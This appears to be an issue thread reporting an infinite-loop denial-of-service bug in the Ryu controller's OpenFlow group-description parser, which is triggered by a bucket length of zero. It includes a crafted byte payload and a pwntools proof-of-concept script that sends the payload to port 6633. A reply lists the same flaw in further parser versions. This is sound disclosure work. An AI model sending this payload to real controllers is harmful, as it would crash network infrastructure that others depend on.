Suggestion for OFPGroupDescStats parser will cause an infinite loop

Question

Suggestion for OFPGroupDescStats parser will cause an infinite loop

ErodedElk opened this issue 7 months ago · comments

in /ryu/ofproto/ofproto_v1_3_parser.py about line=4685

class OFPGroupDescStats(StringifyMixin):
    @classmethod
    def parser(cls, buf, offset):
    ....
        while length < stats.length:
            bucket = OFPBucket.parser(buf, offset)
            stats.buckets.append(bucket)

            offset += bucket.len
            length += bucket.len

If OFPBucket.len=0,the offset and length will no longer change and the parsing will fall into an infinite loop.

payload:

brk=b"\x04\x13\x00\x38\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00"
brk+=b"\x00\x28\x00\x00"
brk+=b"\x00\x00\x00\x00"
bucket="00000001ffffffffffffffff000000000000001000000001ffe5000000000000"
# brk+=bytes.fromhex(bucket)
brk+=bytes.fromhex(bucket)

poc:

from pwn import *
p=remote("0.0.0.0",6633)
brk=b"\x04\x13\x00\x38\x00\x00\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00"
brk+=b"\x00\x28\x00\x00"
brk+=b"\x00\x00\x00\x00"
bucket="00000001ffffffffffffffff000000000000001000000001ffe5000000000000"
# brk+=bytes.fromhex(bucket)
brk+=bytes.fromhex(bucket)
p.send(brk)
p.interactive()

This POC uses OFPGroupDescStatsReply as an example. The OFPGroupDescStatsReply message will be accompanied by an OFPGroupDescStats structure, in which the length of OFPBucket is tampered with to 0.

TokameinE · Answer 1 · Tue Mar 26 2024 11:13:22 GMT+0800 (China Standard Time)

This problem also occurs with the following code:
/ryu/ofproto/ofproto_v1_3_parser.py about line=4685
/ryu/ofproto/ofproto_v1_4_parser.py about line=2548
/ryu/ofproto/ofproto_v1_5_parser.py about line=5893